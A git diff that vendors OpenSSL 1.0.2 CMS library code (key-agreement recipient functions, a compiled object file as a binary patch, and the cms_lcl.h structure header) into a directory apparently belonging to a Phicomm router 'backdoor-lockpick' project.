+    if (!cms_kek_cipher(&cek, &ceklen, enckey, enckeylen, ri->d.kari, 0))
+        goto err;
+    ec = cms->d.envelopedData->encryptedContentInfo;
+    if (ec->key) {
+        OPENSSL_cleanse(ec->key, ec->keylen);
+        OPENSSL_free(ec->key);
+    }
+    ec->key = cek;
+    ec->keylen = ceklen;
+    cek = NULL;
+    rv = 1;
+ err:
+    if (cek)
+        OPENSSL_free(cek);
+    return rv;
+}
+
+/* Create ephemeral key and initialise context based on it */
+static int cms_kari_create_ephemeral_key(CMS_KeyAgreeRecipientInfo *kari,
+                                         EVP_PKEY *pk)
+{
+    EVP_PKEY_CTX *pctx = NULL;
+    EVP_PKEY *ekey = NULL;
+    int rv = 0;
+    pctx = EVP_PKEY_CTX_new(pk, NULL);
+    if (!pctx)
+        goto err;
+    if (EVP_PKEY_keygen_init(pctx) <= 0)
+        goto err;
+    if (EVP_PKEY_keygen(pctx, &ekey) <= 0)
+        goto err;
+    EVP_PKEY_CTX_free(pctx);
+    pctx = EVP_PKEY_CTX_new(ekey, NULL);
+    if (!pctx)
+        goto err;
+    if (EVP_PKEY_derive_init(pctx) <= 0)
+        goto err;
+    kari->pctx = pctx;
+    rv = 1;
+ err:
+    if (!rv && pctx)
+        EVP_PKEY_CTX_free(pctx);
+    if (ekey)
+        EVP_PKEY_free(ekey);
+    return rv;
+}
+
+/* Initialise a ktri based on passed certificate and key */
+
+int cms_RecipientInfo_kari_init(CMS_RecipientInfo *ri, X509 *recip,
+                                EVP_PKEY *pk, unsigned int flags)
+{
+    CMS_KeyAgreeRecipientInfo *kari;
+    CMS_RecipientEncryptedKey *rek = NULL;
+
+    ri->d.kari = M_ASN1_new_of(CMS_KeyAgreeRecipientInfo);
+    if (!ri->d.kari)
+        return 0;
+    ri->type = CMS_RECIPINFO_AGREE;
+
+    kari = ri->d.kari;
+    kari->version = 3;
+
+    rek = M_ASN1_new_of(CMS_RecipientEncryptedKey);
+    if (!sk_CMS_RecipientEncryptedKey_push(kari->recipientEncryptedKeys, rek)) {
+        M_ASN1_free_of(rek, CMS_RecipientEncryptedKey);
+        return 0;
+    }
+
+    if (flags & CMS_USE_KEYID) {
+        rek->rid->type = CMS_REK_KEYIDENTIFIER;
+        if (!cms_set1_keyid(&rek->rid->d.rKeyId->subjectKeyIdentifier, recip))
+            return 0;
+    } else {
+        rek->rid->type = CMS_REK_ISSUER_SERIAL;
+        if (!cms_set1_ias(&rek->rid->d.issuerAndSerialNumber, recip))
+            return 0;
+    }
+
+    /* Create ephemeral key */
+    if (!cms_kari_create_ephemeral_key(kari, pk))
+        return 0;
+
+    CRYPTO_add(&pk->references, 1, CRYPTO_LOCK_EVP_PKEY);
+    rek->pkey = pk;
+    return 1;
+}
+
+static int cms_wrap_init(CMS_KeyAgreeRecipientInfo *kari,
+                         const EVP_CIPHER *cipher)
+{
+    EVP_CIPHER_CTX *ctx = &kari->ctx;
+    const EVP_CIPHER *kekcipher;
+    int keylen = EVP_CIPHER_key_length(cipher);
+    /* If a suitable wrap algorithm is already set nothing to do */
+    kekcipher = EVP_CIPHER_CTX_cipher(ctx);
+
+    if (kekcipher) {
+        if (EVP_CIPHER_CTX_mode(ctx) != EVP_CIPH_WRAP_MODE)
+            return 0;
+        return 1;
+    }
+    /*
+     * Pick a cipher based on content encryption cipher. If it is DES3 use
+     * DES3 wrap otherwise use AES wrap similar to key size.
+     */
+    if (EVP_CIPHER_type(cipher) == NID_des_ede3_cbc)
+        kekcipher = EVP_des_ede3_wrap();
+    else if (keylen <= 16)
+        kekcipher = EVP_aes_128_wrap();
+    else if (keylen <= 24)
+        kekcipher = EVP_aes_192_wrap();
+    else
+        kekcipher = EVP_aes_256_wrap();
+    return EVP_EncryptInit_ex(ctx, kekcipher, NULL, NULL, NULL);
+}
+
+/* Encrypt content key in key agreement recipient info */
+
+int cms_RecipientInfo_kari_encrypt(CMS_ContentInfo *cms,
+                                   CMS_RecipientInfo *ri)
+{
+    CMS_KeyAgreeRecipientInfo *kari;
+    CMS_EncryptedContentInfo *ec;
+    CMS_RecipientEncryptedKey *rek;
+    STACK_OF(CMS_RecipientEncryptedKey) *reks;
+    int i;
+
+    if (ri->type != CMS_RECIPINFO_AGREE) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KARI_ENCRYPT, CMS_R_NOT_KEY_AGREEMENT);
+        return 0;
+    }
+    kari = ri->d.kari;
+    reks = kari->recipientEncryptedKeys;
+    ec = cms->d.envelopedData->encryptedContentInfo;
+    /* Initialise wrap algorithm parameters */
+    if (!cms_wrap_init(kari, ec->cipher))
+        return 0;
+    /*
+     * If no orignator key set up initialise for ephemeral key the public key
+     * ASN1 structure will set the actual public key value.
+     */
+    if (kari->originator->type == -1) {
+        CMS_OriginatorIdentifierOrKey *oik = kari->originator;
+        oik->type = CMS_OIK_PUBKEY;
+        oik->d.originatorKey = M_ASN1_new_of(CMS_OriginatorPublicKey);
+        if (!oik->d.originatorKey)
+            return 0;
+    }
+    /* Initialise KDF algorithm */
+    if (!cms_env_asn1_ctrl(ri, 0))
+        return 0;
+    /* For each rek, derive KEK, encrypt CEK */
+    for (i = 0; i < sk_CMS_RecipientEncryptedKey_num(reks); i++) {
+        unsigned char *enckey;
+        size_t enckeylen;
+        rek = sk_CMS_RecipientEncryptedKey_value(reks, i);
+        if (EVP_PKEY_derive_set_peer(kari->pctx, rek->pkey) <= 0)
+            return 0;
+        if (!cms_kek_cipher(&enckey, &enckeylen, ec->key, ec->keylen,
+                            kari, 1))
+            return 0;
+        ASN1_STRING_set0(rek->encryptedKey, enckey, enckeylen);
+    }
+
+    return 1;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_kari.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_kari.o
new file mode 100644
index 0000000000000000000000000000000000000000..aa12c30e8c6e0ed8972d1a3072083e79187b0d4c
GIT binary patch
literal 8528
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
C(1`;8

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lcl.h
new file mode 100644
index 0000000..20f2c25
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lcl.h
@@ -0,0 +1,471 @@
+/* crypto/cms/cms_lcl.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#ifndef HEADER_CMS_LCL_H
+# define HEADER_CMS_LCL_H
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+# include <openssl/x509.h>
+
+/*
+ * Cryptographic message syntax (CMS) structures: taken from RFC3852
+ */
+
+/* Forward references */
+
+typedef struct CMS_IssuerAndSerialNumber_st CMS_IssuerAndSerialNumber;
+typedef struct CMS_EncapsulatedContentInfo_st CMS_EncapsulatedContentInfo;
+typedef struct CMS_SignerIdentifier_st CMS_SignerIdentifier;
+typedef struct CMS_SignedData_st CMS_SignedData;
+typedef struct CMS_OtherRevocationInfoFormat_st CMS_OtherRevocationInfoFormat;
+typedef struct CMS_OriginatorInfo_st CMS_OriginatorInfo;
+typedef struct CMS_EncryptedContentInfo_st CMS_EncryptedContentInfo;
+typedef struct CMS_EnvelopedData_st CMS_EnvelopedData;
+typedef struct CMS_DigestedData_st CMS_DigestedData;
+typedef struct CMS_EncryptedData_st CMS_EncryptedData;
+typedef struct CMS_AuthenticatedData_st CMS_AuthenticatedData;
+typedef struct CMS_CompressedData_st CMS_CompressedData;
+typedef struct CMS_OtherCertificateFormat_st CMS_OtherCertificateFormat;
+typedef struct CMS_KeyTransRecipientInfo_st CMS_KeyTransRecipientInfo;
+typedef struct CMS_OriginatorPublicKey_st CMS_OriginatorPublicKey;
+typedef struct CMS_OriginatorIdentifierOrKey_st CMS_OriginatorIdentifierOrKey;
+typedef struct CMS_KeyAgreeRecipientInfo_st CMS_KeyAgreeRecipientInfo;
+typedef struct CMS_RecipientKeyIdentifier_st CMS_RecipientKeyIdentifier;
+typedef struct CMS_KeyAgreeRecipientIdentifier_st
+    CMS_KeyAgreeRecipientIdentifier;
+typedef struct CMS_KEKIdentifier_st CMS_KEKIdentifier;
+typedef struct CMS_KEKRecipientInfo_st CMS_KEKRecipientInfo;
+typedef struct CMS_PasswordRecipientInfo_st CMS_PasswordRecipientInfo;
+typedef struct CMS_OtherRecipientInfo_st CMS_OtherRecipientInfo;
+typedef struct CMS_ReceiptsFrom_st CMS_ReceiptsFrom;
+
+struct CMS_ContentInfo_st {
+    ASN1_OBJECT *contentType;
+    union {
+        ASN1_OCTET_STRING *data;
+        CMS_SignedData *signedData;
+        CMS_EnvelopedData *envelopedData;
+        CMS_DigestedData *digestedData;
+        CMS_EncryptedData *encryptedData;
+        CMS_AuthenticatedData *authenticatedData;
+        CMS_CompressedData *compressedData;
+        ASN1_TYPE *other;
+        /* Other types ... */
+        void *otherData;
+    } d;
+};
+
+struct CMS_SignedData_st {
+    long version;
+    STACK_OF(X509_ALGOR) *digestAlgorithms;
+    CMS_EncapsulatedContentInfo *encapContentInfo;
+    STACK_OF(CMS_CertificateChoices) *certificates;
+    STACK_OF(CMS_RevocationInfoChoice) *crls;
+    STACK_OF(CMS_SignerInfo) *signerInfos;
+};
+
+struct CMS_EncapsulatedContentInfo_st {
+    ASN1_OBJECT *eContentType;
+    ASN1_OCTET_STRING *eContent;
+    /* Set to 1 if incomplete structure only part set up */
+    int partial;
+};
+
+struct CMS_SignerInfo_st {
+    long version;
+    CMS_SignerIdentifier *sid;
+    X509_ALGOR *digestAlgorithm;
+    STACK_OF(X509_ATTRIBUTE) *signedAttrs;
+    X509_ALGOR *signatureAlgorithm;
+    ASN1_OCTET_STRING *signature;
+    STACK_OF(X509_ATTRIBUTE) *unsignedAttrs;
+    /* Signing certificate and key */
+    X509 *signer;
+    EVP_PKEY *pkey;
+    /* Digest and public key context for alternative parameters */
+    EVP_MD_CTX mctx;
+    EVP_PKEY_CTX *pctx;
+};
+
+struct CMS_SignerIdentifier_st {
+    int type;
+    union {
+        CMS_IssuerAndSerialNumber *issuerAndSerialNumber;
+        ASN1_OCTET_STRING *subjectKeyIdentifier;
+    } d;
+};
+
+struct CMS_EnvelopedData_st {
+    long version;
+    CMS_OriginatorInfo *originatorInfo;
+    STACK_OF(CMS_RecipientInfo) *recipientInfos;
+    CMS_EncryptedContentInfo *encryptedContentInfo;
+    STACK_OF(X509_ATTRIBUTE) *unprotectedAttrs;
+};
+
+struct CMS_OriginatorInfo_st {
+    STACK_OF(CMS_CertificateChoices) *certificates;
+    STACK_OF(CMS_RevocationInfoChoice) *crls;
+};
+
+struct CMS_EncryptedContentInfo_st {
+    ASN1_OBJECT *contentType;
+    X509_ALGOR *contentEncryptionAlgorithm;
+    ASN1_OCTET_STRING *encryptedContent;
+    /* Content encryption algorithm and key */
+    const EVP_CIPHER *cipher;
+    unsigned char *key;
+    size_t keylen;
+    /* Set to 1 if we are debugging decrypt and don't fake keys for MMA */
+    int debug;
+};
+
+struct CMS_RecipientInfo_st {
+    int type;
+    union {
+        CMS_KeyTransRecipientInfo *ktri;
+        CMS_KeyAgreeRecipientInfo *kari;
+        CMS_KEKRecipientInfo *kekri;
+        CMS_PasswordRecipientInfo *pwri;
+        CMS_OtherRecipientInfo *ori;
+    } d;
+};
+
+typedef CMS_SignerIdentifier CMS_RecipientIdentifier;
+
+struct CMS_KeyTransRecipientInfo_st {
+    long version;
+    CMS_RecipientIdentifier *rid;
+    X509_ALGOR *keyEncryptionAlgorithm;
+    ASN1_OCTET_STRING *encryptedKey;
+    /* Recipient Key and cert */
+    X509 *recip;
+    EVP_PKEY *pkey;
+    /* Public key context for this operation */
+    EVP_PKEY_CTX *pctx;
+};
+
+struct CMS_KeyAgreeRecipientInfo_st {
+    long version;
+    CMS_OriginatorIdentifierOrKey *originator;
+    ASN1_OCTET_STRING *ukm;
+    X509_ALGOR *keyEncryptionAlgorithm;
+    STACK_OF(CMS_RecipientEncryptedKey) *recipientEncryptedKeys;
+    /* Public key context associated with current operation */
+    EVP_PKEY_CTX *pctx;
+    /* Cipher context for CEK wrapping */
+    EVP_CIPHER_CTX ctx;
+};
+
+struct CMS_OriginatorIdentifierOrKey_st {
+    int type;
+    union {
+        CMS_IssuerAndSerialNumber *issuerAndSerialNumber;
+        ASN1_OCTET_STRING *subjectKeyIdentifier;
+        CMS_OriginatorPublicKey *originatorKey;
+    } d;
+};
+
+struct CMS_OriginatorPublicKey_st {
+    X509_ALGOR *algorithm;
+    ASN1_BIT_STRING *publicKey;
+};
+
+struct CMS_RecipientEncryptedKey_st {
+    CMS_KeyAgreeRecipientIdentifier *rid;
+    ASN1_OCTET_STRING *encryptedKey;
+    /* Public key associated with this recipient */
+    EVP_PKEY *pkey;
+};
+
+struct CMS_KeyAgreeRecipientIdentifier_st {
+    int type;
+    union {
+        CMS_IssuerAndSerialNumber *issuerAndSerialNumber;
+        CMS_RecipientKeyIdentifier *rKeyId;
+    } d;
+};
+
+struct CMS_RecipientKeyIdentifier_st {
+    ASN1_OCTET_STRING *subjectKeyIdentifier;
+    ASN1_GENERALIZEDTIME *date;
+    CMS_OtherKeyAttribute *other;
+};
+
+struct CMS_KEKRecipientInfo_st {
+    long version;
+    CMS_KEKIdentifier *kekid;
+    X509_ALGOR *keyEncryptionAlgorithm;
+    ASN1_OCTET_STRING *encryptedKey;
+    /* Extra info: symmetric key to use */
+    unsigned char *key;
+    size_t keylen;
+};
+
+struct CMS_KEKIdentifier_st {
+    ASN1_OCTET_STRING *keyIdentifier;
+    ASN1_GENERALIZEDTIME *date;
+    CMS_OtherKeyAttribute *other;
+};
+
+struct CMS_PasswordRecipientInfo_st {
+    long version;
+    X509_ALGOR *keyDerivationAlgorithm;
+    X509_ALGOR *keyEncryptionAlgorithm;
+    ASN1_OCTET_STRING *encryptedKey;
+    /* Extra info: password to use */
+    unsigned char *pass;
+    size_t passlen;
+};
+
+struct CMS_OtherRecipientInfo_st {
+    ASN1_OBJECT *oriType;
+    ASN1_TYPE *oriValue;
+};
+
+struct CMS_DigestedData_st {
+    long version;
+    X509_ALGOR *digestAlgorithm;
+    CMS_EncapsulatedContentInfo *encapContentInfo;
+    ASN1_OCTET_STRING *digest;
+};
+
+struct CMS_EncryptedData_st {
+    long version;
+    CMS_EncryptedContentInfo *encryptedContentInfo;
+    STACK_OF(X509_ATTRIBUTE) *unprotectedAttrs;
+};
+
+struct CMS_AuthenticatedData_st {
+    long version;
+    CMS_OriginatorInfo *originatorInfo;
+    STACK_OF(CMS_RecipientInfo) *recipientInfos;
+    X509_ALGOR *macAlgorithm;
+    X509_ALGOR *digestAlgorithm;
+    CMS_EncapsulatedContentInfo *encapContentInfo;
+    STACK_OF(X509_ATTRIBUTE) *authAttrs;
+    ASN1_OCTET_STRING *mac;
+    STACK_OF(X509_ATTRIBUTE) *unauthAttrs;
+};
+
+struct CMS_CompressedData_st {
+    long version;
+    X509_ALGOR *compressionAlgorithm;
+    STACK_OF(CMS_RecipientInfo) *recipientInfos;
+    CMS_EncapsulatedContentInfo *encapContentInfo;
+};
+
+struct CMS_RevocationInfoChoice_st {
+    int type;
+    union {
+        X509_CRL *crl;
+        CMS_OtherRevocationInfoFormat *other;
+    } d;
+};
+
+# define CMS_REVCHOICE_CRL               0
+# define CMS_REVCHOICE_OTHER             1
+
+struct CMS_OtherRevocationInfoFormat_st {
+    ASN1_OBJECT *otherRevInfoFormat;
+    ASN1_TYPE *otherRevInfo;
+};
+
+struct CMS_CertificateChoices {
+    int type;
+    union {
+        X509 *certificate;
+        ASN1_STRING *extendedCertificate; /* Obsolete */
+        ASN1_STRING *v1AttrCert; /* Left encoded for now */
+        ASN1_STRING *v2AttrCert; /* Left encoded for now */
+        CMS_OtherCertificateFormat *other;
+    } d;
+};
+
+# define CMS_CERTCHOICE_CERT             0
+# define CMS_CERTCHOICE_EXCERT           1
+# define CMS_CERTCHOICE_V1ACERT          2
+# define CMS_CERTCHOICE_V2ACERT          3
+# define CMS_CERTCHOICE_OTHER            4
+
+struct CMS_OtherCertificateFormat_st {
+    ASN1_OBJECT *otherCertFormat;
+    ASN1_TYPE *otherCert;
+};
+
+/*
+ * This is also defined in pkcs7.h but we duplicate it to allow the CMS code
+ * to be independent of PKCS#7
+ */
+
+struct CMS_IssuerAndSerialNumber_st {
+    X509_NAME *issuer;
+    ASN1_INTEGER *serialNumber;
+};
+
+struct CMS_OtherKeyAttribute_st {
+    ASN1_OBJECT *keyAttrId;
+    ASN1_TYPE *keyAttr;
+};
+
+/* ESS structures */
+
+# ifdef HEADER_X509V3_H
+
+struct CMS_ReceiptRequest_st {
+    ASN1_OCTET_STRING *signedContentIdentifier;
+    CMS_ReceiptsFrom *receiptsFrom;
+    STACK_OF(GENERAL_NAMES) *receiptsTo;
+};
+
+struct CMS_ReceiptsFrom_st {
+    int type;
+    union {
+        long allOrFirstTier;
+        STACK_OF(GENERAL_NAMES) *receiptList;
+    } d;
+};
+# endif
+
+struct CMS_Receipt_st {
+    long version;
+    ASN1_OBJECT *contentType;
+    ASN1_OCTET_STRING *signedContentIdentifier;
+    ASN1_OCTET_STRING *originatorSignatureValue;
+};
+
+DECLARE_ASN1_FUNCTIONS(CMS_ContentInfo)
+DECLARE_ASN1_ITEM(CMS_SignerInfo)
+DECLARE_ASN1_ITEM(CMS_IssuerAndSerialNumber)
+DECLARE_ASN1_ITEM(CMS_Attributes_Sign)
+DECLARE_ASN1_ITEM(CMS_Attributes_Verify)
+DECLARE_ASN1_ITEM(CMS_RecipientInfo)
+DECLARE_ASN1_ITEM(CMS_PasswordRecipientInfo)
+DECLARE_ASN1_ALLOC_FUNCTIONS(CMS_IssuerAndSerialNumber)
+
+# define CMS_SIGNERINFO_ISSUER_SERIAL    0
+# define CMS_SIGNERINFO_KEYIDENTIFIER    1
+
+# define CMS_RECIPINFO_ISSUER_SERIAL     0
+# define CMS_RECIPINFO_KEYIDENTIFIER     1
+
+# define CMS_REK_ISSUER_SERIAL           0
+# define CMS_REK_KEYIDENTIFIER           1
+
+# define CMS_OIK_ISSUER_SERIAL           0
+# define CMS_OIK_KEYIDENTIFIER           1
+# define CMS_OIK_PUBKEY                  2
+
+BIO *cms_content_bio(CMS_ContentInfo *cms);
+
+CMS_ContentInfo *cms_Data_create(void);
+
+CMS_ContentInfo *cms_DigestedData_create(const EVP_MD *md);
+BIO *cms_DigestedData_init_bio(CMS_ContentInfo *cms);
+int cms_DigestedData_do_final(CMS_ContentInfo *cms, BIO *chain, int verify);
+
+BIO *cms_SignedData_init_bio(CMS_ContentInfo *cms);
+int cms_SignedData_final(CMS_ContentInfo *cms, BIO *chain);
